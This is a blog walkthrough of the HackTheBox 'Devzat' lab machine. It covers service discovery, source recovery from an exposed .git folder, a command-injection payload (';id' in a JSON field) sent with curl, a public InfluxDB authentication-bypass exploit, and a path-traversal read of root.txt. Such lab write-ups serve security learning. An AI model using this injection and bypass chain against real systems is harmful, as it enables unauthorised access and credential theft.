<!doctype html><html lang=en dir=auto><head><meta charset=utf-8><meta http-equiv=x-ua-compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name=robots content="index, follow"><title>HackTheBox: "Devzat" Walkthrough | Micha's Attic</title><meta name=keywords content="hackthebox,ctf"><meta name=description content="Foothold Let&rsquo;s start with an nmap scan - we&rsquo;ll find the usual open ports 22/tcp and 80/tcp, but there is more (snippet from the nmap output):
8000/tcp open ssh (protocol 2.0) | fingerprint-strings: | NULL: |_ SSH-2.0-Go So there is an additional SSH server running on port 8000. The machine names on HackTheBox are usually also a hint, and a search reveals a GitHub repository containing a chat server called devzat, based on SSH."><meta name=author content="Micha"><link rel=canonical href=https://blog.micha.gg/2022/04/26/hackthebox-devzat-walkthrough/><link crossorigin=anonymous href=/assets/css/stylesheet.min.79a4c9cb65f7123f4c4abeceb6301a04f3860036c1b9bf5fe9749f7df83ac0cf.css integrity="sha256-eaTJy2X3Ej9MSr7OtjAaBPOGADbBub9f6XSfffg6wM8=" rel="preload stylesheet" as=style><script defer crossorigin=anonymous src=/assets/js/highlight.min.2840b7fccd34145847db71a290569594bdbdb00047097f75d6495d162f5d7dff.js integrity="sha256-KEC3/M00FFhH23GikFaVlL29sABHCX911kldFi9dff8=" onload=hljs.initHighlightingOnLoad()></script>
<link rel=icon href=https://blog.micha.gg/favicon.ico><link rel=icon type=image/png sizes=16x16 href=https://blog.micha.gg/favicon-16x16.png><link rel=icon type=image/png sizes=32x32 href=https://blog.micha.gg/favicon-32x32.png><link rel=apple-touch-icon href=https://blog.micha.gg/apple-touch-icon.png><link rel=mask-icon href=https://blog.micha.gg/safari-pinned-tab.svg><meta name=theme-color content="#2e2e33"><meta name=msapplication-TileColor content="#2e2e33"><meta name=generator content="Hugo 0.97.3"><noscript><style>#theme-toggle,.top-link{display:none}</style><style>@media(prefers-color-scheme:dark){:root{--theme:rgb(29, 30, 32);--entry:rgb(46, 46, 51);--primary:rgb(218, 218, 219);--secondary:rgb(155, 156, 157);--tertiary:rgb(65, 66, 68);--content:rgb(196, 196, 197);--hljs-bg:rgb(46, 46, 51);--code-bg:rgb(55, 56, 62);--border:rgb(51, 51, 51)}.list{background:var(--theme)}.list:not(.dark)::-webkit-scrollbar-track{background:0 0}.list:not(.dark)::-webkit-scrollbar-thumb{border-color:var(--theme)}}</style></noscript><meta property="og:title" content="HackTheBox: &#34;Devzat&#34; Walkthrough"><meta property="og:description" content="Foothold Let&rsquo;s start with an nmap scan - we&rsquo;ll find the usual open ports 22/tcp and 80/tcp, but there is more (snippet from the nmap output):
8000/tcp open ssh (protocol 2.0) | fingerprint-strings: | NULL: |_ SSH-2.0-Go So there is an additional SSH server running on port 8000. The machine names on HackTheBox are usually also a hint, and a search reveals a GitHub repository containing a chat server called devzat, based on SSH."><meta property="og:type" content="article"><meta property="og:url" content="https://blog.micha.gg/2022/04/26/hackthebox-devzat-walkthrough/"><meta property="article:section" content="posts"><meta property="article:published_time" content="2022-04-26T00:00:00+02:00"><meta property="article:modified_time" content="2022-04-26T00:00:00+02:00"><meta property="og:site_name" content="Micha's Attic"><meta name=twitter:card content="summary"><meta name=twitter:title content="HackTheBox: &#34;Devzat&#34; Walkthrough"><meta name=twitter:description content="Foothold Let&rsquo;s start with an nmap scan - we&rsquo;ll find the usual open ports 22/tcp and 80/tcp, but there is more (snippet from the nmap output):
8000/tcp open ssh (protocol 2.0) | fingerprint-strings: | NULL: |_ SSH-2.0-Go So there is an additional SSH server running on port 8000. The machine names on HackTheBox are usually also a hint, and a search reveals a GitHub repository containing a chat server called devzat, based on SSH."><script type=application/ld+json>{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Posts","item":"https://blog.micha.gg/posts/"},{"@type":"ListItem","position":2,"name":"HackTheBox: \"Devzat\" Walkthrough","item":"https://blog.micha.gg/2022/04/26/hackthebox-devzat-walkthrough/"}]}</script><script type=application/ld+json>{"@context":"https://schema.org","@type":"BlogPosting","headline":"HackTheBox: \"Devzat\" Walkthrough","name":"HackTheBox: \u0022Devzat\u0022 Walkthrough","description":"Foothold Let\u0026rsquo;s start with an nmap scan - we\u0026rsquo;ll find the usual open ports 22/tcp and 80/tcp, but there is more (snippet from the nmap output):\n8000/tcp open ssh (protocol 2.0) | fingerprint-strings: | NULL: |_ SSH-2.0-Go So there is an additional SSH server running on port 8000. The machine names on HackTheBox are usually also a hint, and a search reveals a GitHub repository containing a chat server called devzat, based on SSH.","keywords":["hackthebox","ctf"],"articleBody":"Foothold Let’s start with an nmap scan - we’ll find the usual open ports 22/tcp and 80/tcp, but there is more (snippet from the nmap output):\n8000/tcp open ssh (protocol 2.0) | fingerprint-strings: | NULL: |_ SSH-2.0-Go So there is an additional SSH server running on port 8000. The machine names on HackTheBox are usually also a hint, and a search reveals a GitHub repository containing a chat server called devzat, based on SSH. (Even without searching for or finding this repository, it would be a good idea to try connecting to this server. Furthermore, the landing page on port 80 explicitly tells how to connect to this chatserver.)\nWe can connect the server, but it looks like we can’t do anything interesting:\n$ ssh -l root devzat.htb -p 8000 -oHostKeyAlgorithms=+ssh-rsa Welcome to the chat. There are no more users devbot: root has joined the chat root: /commands [SYSTEM] Commands [SYSTEM] clear - Clears your terminal [SYSTEM] message - Sends a private message to someone [SYSTEM] users - Gets a list of the active users [SYSTEM] all - Gets a list of all users who has ever connected [SYSTEM] exit - Kicks you out of the chat incase your client was bugged [SYSTEM] bell - Toggles notifications when you get pinged [SYSTEM] room - Changes which room you are currently in [SYSTEM] id - Gets the hashed IP of the user [SYSTEM] commands - Get a list of commands [SYSTEM] nick - Change your display name [SYSTEM] color - Change your display name color [SYSTEM] timezone - Change how you view time [SYSTEM] emojis - Get a list of emojis you can use [SYSTEM] help - Get generic info about the server [SYSTEM] tictactoe - Play tictactoe [SYSTEM] hangman - Play hangman [SYSTEM] shrug - Drops a shrug emoji [SYSTEM] ascii-art - Bob ross with text [SYSTEM] example-code - Hello world! root: But we are also not yet finished with scanning:\n A directory scan on the landing page does not yield anything A vhost scan will reveal the domain pets.devzat.htb. We visit this domain and play around a bit, but it’s not clear how we can utilize this site. Finally, a directory scan on this subdomain reveals a .git folder!  We can access http://pets.devzat.htb/.git/ and see that directory listing is also enabled - that’s very convenient and makes it easy to download the contents of the git folder. For this task, there is also a nifty tool called git-dumper, which can also be used if directory listing is disabled.\nAs we now have access to the source of the site, let’s dig into it - the following lines are the interesting pieces inside main.go:\nfunc loadCharacter(species string) string { \tcmd := exec.Command(\"sh\", \"-c\", \"cat characteristics/\"+species) \t// ... }  func addPet(w http.ResponseWriter, r *http.Request) { \t// ... \taddPet.Characteristics = loadCharacter(addPet.Species) \t// ... } We found a pretty obvious RCE!\nUser Let’s try the RCE we just found:\n$ curl -X POST 'http://pets.devzat.htb/api/pet' -d '{\"name\":\"test\",\"species\":\";id\"}' Visiting the website then shows this entry:\n cat: characteristics/: Is a directory uid=1000(patrick) gid=1000(patrick) groups=1000(patrick)\n Now, we just have to upload our SSH pubkey and can then login as user “patrick”. Unfortunately, there is no user flag in patrick’s home directory. Upon listing the /home directory, we notice there is another user called “catherine”.\nI like reading source code, so I’m having a look in the devzat folder in patrick’s home dir. In ~/devzat/devchat.go we see there is some special handling when we are connecting locally:\npatrick@devzat:~$ ssh 127.0.0.1 -p 8000 admin: Hey patrick, you there? patrick: Sure, shoot boss! admin: So I setup the influxdb for you as we discussed earlier in business meeting. patrick: Cool 👍 admin: Be sure to check it out and see if it works for you, will ya? patrick: Yes, sure. Am on it! (Yeah, it seems a bit made up that the chat history is hard coded in the source files of the chat server - but let’s just accept it. After all, it could also be a “real” chat server that stores the history somewhere and replays the chat backlog upon connecting.)\nThus, the next clue is: InfluxDB. The default port for the InfluxDB HTTP service is 8086, and using netstat we can see this port is indeed listened to, so let’s probe it:\npatrick@devzat:~$ wget --server-response http://127.0.0.1:8086 --2022-04-25 12:53:08-- http://127.0.0.1:8086/ Connecting to 127.0.0.1:8086... connected. HTTP request sent, awaiting response...  HTTP/1.1 404 Not Found  Content-Type: text/plain; charset=utf-8  X-Content-Type-Options: nosniff  X-Influxdb-Build: OSS  X-Influxdb-Version: 1.7.5  Date: Mon, 25 Apr 2022 12:53:08 GMT  Content-Length: 19 Nice, so we now got a version number: 1.7.5. That makes it much easier to look for known exploits - in this case:\n CVE-2019-20933: InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).\n It’s always a good idea to search for the CVE number together with “github” and/or “poc”. In this case, we quickly find a GitHub repository with a Python script to exploit vulnerable InfluxDB versions. We can upload this script to the machine and try to run it there - but this will fail because some packages are missing. So I’ll just use SSH forwarding for port 8086 and run the script on my machine (I’ve compacted the output a bit):\nHost vulnerable !!!  Databases:  1) devzat 2) _internal  .quit to exit [admin@127.0.0.1] Database: devzat [admin@127.0.0.1/devzat] $ show measurements;  \"values\": [  [  \"user\"  ] [admin@127.0.0.1/devzat] $ select * from \"user\"; {  \"values\": [  [  \"\",  \"catherine\"  ], Now just su catherine and we can read the user flag!\nRoot We already had some success when connecting to the chatserver as “patrick”, so let’s try again as “catherine”:\ncatherine@devzat:~$ ssh 127.0.0.1 -p 8000 patrick: Hey Catherine, glad you came. catherine: Hey bud, what are you up to? patrick: Remember the cool new feature we talked about the other day? catherine: Sure patrick: I implemented it. If you want to check it out you could connect to the local dev instance on port 8443. catherine: Kinda busy right now 👔 patrick: That's perfectly fine 👍 You'll need a password I gave you last time. catherine: k patrick: I left the source for your review in backups. catherine: Fine. As soon as the boss let me off the leash I will check it out. patrick: Cool. I am very curious what you think of it. See ya! Let’s follow the trail:\ncatherine@devzat:~$ ssh 127.0.0.1 -p 8443 patrick: Hey Catherine, glad you came. catherine: Hey bud, what are you up to? patrick: Remember the cool new feature we talked about the other day? catherine: Sure patrick: I implemented it. If you want to check it out you could connect to the local dev instance on port 8443. catherine: Kinda busy right now 👔 patrick: That's perfectly fine 👍 You'll need a password which you can gather from the source. I left it in our default backups location. catherine: k patrick: I also put the main so you could diff main dev if you want. catherine: Fine. As soon as the boss let me off the leash I will check it out. patrick: Cool. I am very curious what you think of it. Consider it alpha state, though. Might not be secure yet. See ya! Again, pretty obvious hints. In /var/backups we will find devzat-dev.zip and devzat-main.zip. I didn’t diff the two files but instead directly looked at the contents of the devzat-dev.zip file, more specifically the commands.go file.\nIt doesn’t take long until we notice:\nfile = commandInfo{\"file\", \"Paste a files content directly to chat [alpha]\", fileCommand, 1, false, nil} … with the implementation of this command right next to it (only interesting lines shown):\nfunc fileCommand(u *user, args []string) { // ...  // Check my secure password  if pass != \"\" {  u.system(\"You did provide the wrong password\")  return  } // ... } All right, let’s try this command:\ncatherine@devzat:~$ ssh 127.0.0.1 -p 8443 catherine: /file ../root.txt  [SYSTEM]  Conclusion and Learnings All in all, this machine was pretty much straight forward. The foothold required quite a bit of scanning, but after finding the first RCE the next hints were not subtle. It took me a moment to figure out how InfluxDB works, because I’ve never used it before, though.\n","wordCount":"1380","inLanguage":"en","datePublished":"2022-04-26T00:00:00+02:00","dateModified":"2022-04-26T00:00:00+02:00","author":{"@type":"Person","name":"Micha"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://blog.micha.gg/2022/04/26/hackthebox-devzat-walkthrough/"},"publisher":{"@type":"Organization","name":"Micha's Attic","logo":{"@type":"ImageObject","url":"https://blog.micha.gg/favicon.ico"}}}</script></head><body id=top><script>localStorage.getItem("pref-theme")==="dark"?document.body.classList.add("dark"):localStorage.getItem("pref-theme")==="light"?document.body.classList.remove("dark"):window.matchMedia("(prefers-color-scheme: dark)").matches&&document.body.classList.add("dark")</script><header class=header><nav class=nav><div class=logo><a href=https://blog.micha.gg/ accesskey=h title="Micha's Attic (Alt + H)">Micha's Attic</a>
<span class=logo-switches><button id=theme-toggle accesskey=t title="(Alt + T)"><svg id="moon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 12.79A9 9 0 1111.21 3 7 7 0 0021 12.79z"/></svg><svg id="sun" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="5"/><line x1="12" y1="1" x2="12" y2="3"/><line x1="12" y1="21" x2="12" y2="23"/><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"/><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"/><line x1="1" y1="12" x2="3" y2="12"/><line x1="21" y1="12" x2="23" y2="12"/><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"/><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"/></svg></button></span></div><ul id=menu><li><a href=https://blog.micha.gg/tags/ title=Tags><span>Tags</span></a></li></ul></nav></header><main class=main><article class=post-single><header class=post-header><div class=breadcrumbs><a href=https://blog.micha.gg/>Home</a>&nbsp;»&nbsp;<a href=https://blog.micha.gg/posts/>Posts</a></div><h1 class=post-title>HackTheBox: "Devzat" Walkthrough</h1><div class=post-meta><span title="2022-04-26 00:00:00 +0200 CEST">April 26, 2022</span>&nbsp;·&nbsp;7 min&nbsp;·&nbsp;Micha</div></header><div class=toc><details open><summary accesskey=c title="(Alt + C)"><span class=details>Table of Contents</span></summary><div class=inner><ul><li><a href=#foothold aria-label=Foothold>Foothold</a></li><li><a href=#user aria-label=User>User</a></li><li><a href=#root aria-label=Root>Root</a></li><li><a href=#conclusion-and-learnings aria-label="Conclusion and Learnings">Conclusion and Learnings</a></li></ul></div></details></div><div class=post-content><h1 id=foothold>Foothold<a hidden class=anchor aria-hidden=true href=#foothold>#</a></h1><p>Let&rsquo;s start with an nmap scan - we&rsquo;ll find the usual open ports <code>22/tcp</code> and <code>80/tcp</code>,
but there is more (snippet from the nmap output):</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>8000/tcp open  ssh     (protocol 2.0)
</span></span><span style=display:flex><span>| fingerprint-strings:
</span></span><span style=display:flex><span>|   NULL:
</span></span><span style=display:flex><span>|_    SSH-2.0-Go
</span></span></code></pre></div><p>So there is an additional SSH server running on port 8000. The machine names
on HackTheBox are usually also a hint, and a search reveals
<a href=https://github.com/quackduck/devzat>a GitHub repository</a> containing
a chat server called <em>devzat</em>, based on SSH. (Even without searching for
or finding this repository, it would be a good idea to try connecting
to this server. Furthermore, the landing page on port 80 explicitly tells how to
connect to this chatserver.)</p><p>We can connect the server, but it looks like we can&rsquo;t do anything interesting:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>$ ssh -l root devzat.htb -p 8000 -oHostKeyAlgorithms=+ssh-rsa
</span></span><span style=display:flex><span>Welcome to the chat. There are no more users
</span></span><span style=display:flex><span>devbot: root has joined the chat
</span></span><span style=display:flex><span>root: /commands
</span></span><span style=display:flex><span>[SYSTEM] Commands
</span></span><span style=display:flex><span>[SYSTEM] clear - Clears your terminal
</span></span><span style=display:flex><span>[SYSTEM] message - Sends a private message to someone
</span></span><span style=display:flex><span>[SYSTEM] users - Gets a list of the active users
</span></span><span style=display:flex><span>[SYSTEM] all - Gets a list of all users who has ever connected
</span></span><span style=display:flex><span>[SYSTEM] exit - Kicks you out of the chat incase your client was bugged
</span></span><span style=display:flex><span>[SYSTEM] bell - Toggles notifications when you get pinged
</span></span><span style=display:flex><span>[SYSTEM] room - Changes which room you are currently in
</span></span><span style=display:flex><span>[SYSTEM] id - Gets the hashed IP of the user
</span></span><span style=display:flex><span>[SYSTEM] commands - Get a list of commands
</span></span><span style=display:flex><span>[SYSTEM] nick - Change your display name
</span></span><span style=display:flex><span>[SYSTEM] color - Change your display name color
</span></span><span style=display:flex><span>[SYSTEM] timezone - Change how you view time
</span></span><span style=display:flex><span>[SYSTEM] emojis - Get a list of emojis you can use
</span></span><span style=display:flex><span>[SYSTEM] help - Get generic info about the server
</span></span><span style=display:flex><span>[SYSTEM] tictactoe - Play tictactoe
</span></span><span style=display:flex><span>[SYSTEM] hangman - Play hangman
</span></span><span style=display:flex><span>[SYSTEM] shrug - Drops a shrug emoji
</span></span><span style=display:flex><span>[SYSTEM] ascii-art - Bob ross with text
</span></span><span style=display:flex><span>[SYSTEM] example-code - Hello world!
</span></span><span style=display:flex><span>root:
</span></span></code></pre></div><p>But we are also not yet finished with scanning:</p><ul><li>A directory scan on the landing page does not yield anything</li><li>A vhost scan will reveal the domain <code>pets.devzat.htb</code>. We visit this domain
and play around a bit, but it&rsquo;s not clear how we can utilize this site.</li><li>Finally, a directory scan on this subdomain reveals a <code>.git</code> folder!</li></ul><p>We can access <code>http://pets.devzat.htb/.git/</code> and see that directory
listing is also enabled - that&rsquo;s very convenient and makes it easy
to download the contents of the git folder.
For this task, there is also a nifty tool called <a href=https://github.com/arthaud/git-dumper>git-dumper</a>,
which can also be used if directory listing is disabled.</p><p>As we now have access to the source of the site, let&rsquo;s dig into it -
the following lines are the interesting pieces inside <code>main.go</code>:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-go data-lang=go><span style=display:flex><span><span style=color:#66d9ef>func</span> <span style=color:#a6e22e>loadCharacter</span>(<span style=color:#a6e22e>species</span> <span style=color:#66d9ef>string</span>) <span style=color:#66d9ef>string</span> {
</span></span><span style=display:flex><span>	<span style=color:#a6e22e>cmd</span> <span style=color:#f92672>:=</span> <span style=color:#a6e22e>exec</span>.<span style=color:#a6e22e>Command</span>(<span style=color:#e6db74>&#34;sh&#34;</span>, <span style=color:#e6db74>&#34;-c&#34;</span>, <span style=color:#e6db74>&#34;cat characteristics/&#34;</span><span style=color:#f92672>+</span><span style=color:#a6e22e>species</span>)
</span></span><span style=display:flex><span>	<span style=color:#75715e>// ...
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>func</span> <span style=color:#a6e22e>addPet</span>(<span style=color:#a6e22e>w</span> <span style=color:#a6e22e>http</span>.<span style=color:#a6e22e>ResponseWriter</span>, <span style=color:#a6e22e>r</span> <span style=color:#f92672>*</span><span style=color:#a6e22e>http</span>.<span style=color:#a6e22e>Request</span>) {
</span></span><span style=display:flex><span>	<span style=color:#75715e>// ...
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>	<span style=color:#a6e22e>addPet</span>.<span style=color:#a6e22e>Characteristics</span> = <span style=color:#a6e22e>loadCharacter</span>(<span style=color:#a6e22e>addPet</span>.<span style=color:#a6e22e>Species</span>)
</span></span><span style=display:flex><span>	<span style=color:#75715e>// ...
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>}
</span></span></code></pre></div><p>We found a pretty obvious RCE!</p><h1 id=user>User<a hidden class=anchor aria-hidden=true href=#user>#</a></h1><p>Let&rsquo;s try the RCE we just found:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>$ curl -X POST &#39;http://pets.devzat.htb/api/pet&#39; -d &#39;{&#34;name&#34;:&#34;test&#34;,&#34;species&#34;:&#34;;id&#34;}&#39;
</span></span></code></pre></div><p>Visiting the website then shows this entry:</p><blockquote><p>cat: characteristics/: Is a directory uid=1000(patrick) gid=1000(patrick) groups=1000(patrick)</p></blockquote><p>Now, we just have to upload our SSH pubkey and can then login as user &ldquo;patrick&rdquo;.
Unfortunately, there is no user flag in patrick&rsquo;s home directory. Upon listing
the <code>/home</code> directory, we notice there is another user called &ldquo;catherine&rdquo;.</p><p>I like reading source code, so I&rsquo;m having a look in the <code>devzat</code> folder in patrick&rsquo;s
home dir. In <code>~/devzat/devchat.go</code> we see there is some special handling when
we are connecting locally:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>patrick@devzat:~$ ssh 127.0.0.1 -p 8000
</span></span><span style=display:flex><span>admin: Hey patrick, you there?
</span></span><span style=display:flex><span>patrick: Sure, shoot boss!
</span></span><span style=display:flex><span>admin: So I setup the influxdb for you as we discussed earlier in business meeting.
</span></span><span style=display:flex><span>patrick: Cool 👍
</span></span><span style=display:flex><span>admin: Be sure to check it out and see if it works for you, will ya?
</span></span><span style=display:flex><span>patrick: Yes, sure. Am on it!
</span></span></code></pre></div><p><em>(Yeah, it seems a bit made up that the chat history is hard coded in the
source files of the chat server - but let&rsquo;s just accept it. After all, it could
also be a &ldquo;real&rdquo; chat server that stores the history somewhere and replays the
chat backlog upon connecting.)</em></p><p>Thus, the next clue is: InfluxDB. The default port for the InfluxDB HTTP service
is 8086, and using netstat we can see this port is indeed listened to, so let&rsquo;s probe it:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>patrick@devzat:~$ wget --server-response http://127.0.0.1:8086
</span></span><span style=display:flex><span>--2022-04-25 12:53:08--  http://127.0.0.1:8086/
</span></span><span style=display:flex><span>Connecting to 127.0.0.1:8086... connected.
</span></span><span style=display:flex><span>HTTP request sent, awaiting response...
</span></span><span style=display:flex><span>  HTTP/1.1 404 Not Found
</span></span><span style=display:flex><span>  Content-Type: text/plain; charset=utf-8
</span></span><span style=display:flex><span>  X-Content-Type-Options: nosniff
</span></span><span style=display:flex><span>  X-Influxdb-Build: OSS
</span></span><span style=display:flex><span>  X-Influxdb-Version: 1.7.5
</span></span><span style=display:flex><span>  Date: Mon, 25 Apr 2022 12:53:08 GMT
</span></span><span style=display:flex><span>  Content-Length: 19
</span></span></code></pre></div><p>Nice, so we now got a version number: 1.7.5. That makes it much easier to look
for known exploits - in this case:</p><blockquote><p><strong>CVE-2019-20933:</strong> InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).</p></blockquote><p>It&rsquo;s always a good idea to search for the CVE number together with <em>&ldquo;github&rdquo;</em>
and/or <em>&ldquo;poc&rdquo;</em>. In this case, we quickly find a <a href=https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933>GitHub repository</a> with a Python script to exploit vulnerable InfluxDB versions.
We can upload this script to the machine and try to run it there - but this will
fail because some packages are missing. So I&rsquo;ll just use SSH forwarding for port 8086
and run the script on my machine (I&rsquo;ve compacted the output a bit):</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>Host vulnerable !!!
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Databases:
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>1) devzat
</span></span><span style=display:flex><span>2) _internal
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>.quit to exit
</span></span><span style=display:flex><span>[admin@127.0.0.1] Database: devzat
</span></span><span style=display:flex><span>[admin@127.0.0.1/devzat] $ show measurements;
</span></span><span style=display:flex><span>                    &#34;values&#34;: [
</span></span><span style=display:flex><span>                        [
</span></span><span style=display:flex><span>                            &#34;user&#34;
</span></span><span style=display:flex><span>                        ]
</span></span><span style=display:flex><span>[admin@127.0.0.1/devzat] $ select * from &#34;user&#34;;
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>                    &#34;values&#34;: [
</span></span><span style=display:flex><span>                        [
</span></span><span style=display:flex><span>                            &#34;&lt;password&gt;&#34;,
</span></span><span style=display:flex><span>                            &#34;catherine&#34;
</span></span><span style=display:flex><span>                        ],
</span></span></code></pre></div><p>Now just <code>su catherine</code> and we can read the user flag!</p><h1 id=root>Root<a hidden class=anchor aria-hidden=true href=#root>#</a></h1><p>We already had some success when connecting to the chatserver as &ldquo;patrick&rdquo;, so let&rsquo;s
try again as &ldquo;catherine&rdquo;:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>catherine@devzat:~$ ssh 127.0.0.1 -p 8000
</span></span><span style=display:flex><span>patrick: Hey Catherine, glad you came.
</span></span><span style=display:flex><span>catherine: Hey bud, what are you up to?
</span></span><span style=display:flex><span>patrick: Remember the cool new feature we talked about the other day?
</span></span><span style=display:flex><span>catherine: Sure
</span></span><span style=display:flex><span>patrick: I implemented it. If you want to check it out you could connect to the local dev instance on port 8443.
</span></span><span style=display:flex><span>catherine: Kinda busy right now 👔
</span></span><span style=display:flex><span>patrick: That&#39;s perfectly fine 👍  You&#39;ll need a password I gave you last time.
</span></span><span style=display:flex><span>catherine: k
</span></span><span style=display:flex><span>patrick: I left the source for your review in backups.
</span></span><span style=display:flex><span>catherine: Fine. As soon as the boss let me off the leash I will check it out.
</span></span><span style=display:flex><span>patrick: Cool. I am very curious what you think of it. See ya!
</span></span></code></pre></div><p>Let&rsquo;s follow the trail:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>catherine@devzat:~$ ssh 127.0.0.1 -p 8443
</span></span><span style=display:flex><span>patrick: Hey Catherine, glad you came.
</span></span><span style=display:flex><span>catherine: Hey bud, what are you up to?
</span></span><span style=display:flex><span>patrick: Remember the cool new feature we talked about the other day?
</span></span><span style=display:flex><span>catherine: Sure
</span></span><span style=display:flex><span>patrick: I implemented it. If you want to check it out you could connect to the local dev instance on port 8443.
</span></span><span style=display:flex><span>catherine: Kinda busy right now 👔
</span></span><span style=display:flex><span>patrick: That&#39;s perfectly fine 👍  You&#39;ll need a password which you can gather from the source. I left it in our default backups location.
</span></span><span style=display:flex><span>catherine: k
</span></span><span style=display:flex><span>patrick: I also put the main so you could diff main dev if you want.
</span></span><span style=display:flex><span>catherine: Fine. As soon as the boss let me off the leash I will check it out.
</span></span><span style=display:flex><span>patrick: Cool. I am very curious what you think of it. Consider it alpha state, though. Might not be secure yet. See ya!
</span></span></code></pre></div><p>Again, pretty obvious hints. In <code>/var/backups</code> we will find <code>devzat-dev.zip</code> and <code>devzat-main.zip</code>.
I didn&rsquo;t diff the two files but instead directly looked at the contents of
the <code>devzat-dev.zip</code> file, more specifically the <code>commands.go</code> file.</p><p>It doesn&rsquo;t take long until we notice:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-go data-lang=go><span style=display:flex><span><span style=color:#a6e22e>file</span> = <span style=color:#a6e22e>commandInfo</span>{<span style=color:#e6db74>&#34;file&#34;</span>, <span style=color:#e6db74>&#34;Paste a files content directly to chat [alpha]&#34;</span>, <span style=color:#a6e22e>fileCommand</span>, <span style=color:#ae81ff>1</span>, <span style=color:#66d9ef>false</span>, <span style=color:#66d9ef>nil</span>}
</span></span></code></pre></div><p>&mldr; with the implementation of this command right next to it (only interesting lines shown):</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-go data-lang=go><span style=display:flex><span><span style=color:#66d9ef>func</span> <span style=color:#a6e22e>fileCommand</span>(<span style=color:#a6e22e>u</span> <span style=color:#f92672>*</span><span style=color:#a6e22e>user</span>, <span style=color:#a6e22e>args</span> []<span style=color:#66d9ef>string</span>) {
</span></span><span style=display:flex><span><span style=color:#75715e>// ...
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>        <span style=color:#75715e>// Check my secure password
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>        <span style=color:#66d9ef>if</span> <span style=color:#a6e22e>pass</span> <span style=color:#f92672>!=</span> <span style=color:#e6db74>&#34;&lt;password&gt;&#34;</span> {
</span></span><span style=display:flex><span>                <span style=color:#a6e22e>u</span>.<span style=color:#a6e22e>system</span>(<span style=color:#e6db74>&#34;You did provide the wrong password&#34;</span>)
</span></span><span style=display:flex><span>                <span style=color:#66d9ef>return</span>
</span></span><span style=display:flex><span>        }
</span></span><span style=display:flex><span><span style=color:#75715e>// ...
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>}
</span></span></code></pre></div><p>All right, let&rsquo;s try this command:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-plain data-lang=plain><span style=display:flex><span>catherine@devzat:~$ ssh 127.0.0.1 -p 8443
</span></span><span style=display:flex><span>catherine: /file ../root.txt &lt;password&gt;
</span></span><span style=display:flex><span>[SYSTEM] &lt;flag&gt;
</span></span></code></pre></div><h1 id=conclusion-and-learnings>Conclusion and Learnings<a hidden class=anchor aria-hidden=true href=#conclusion-and-learnings>#</a></h1><p>All in all, this machine was pretty much straight forward.
The foothold required quite a bit of scanning, but after finding
the first RCE the next hints were not subtle. It took me
a moment to figure out how InfluxDB works,
because I&rsquo;ve never used it before, though.</p></div><footer class=post-footer><ul class=post-tags><li><a href=https://blog.micha.gg/tags/hackthebox/>hackthebox</a></li><li><a href=https://blog.micha.gg/tags/ctf/>ctf</a></li></ul></footer></article></main><footer class=footer><span>&copy; 2022 <a href=https://blog.micha.gg/>Micha's Attic</a></span>
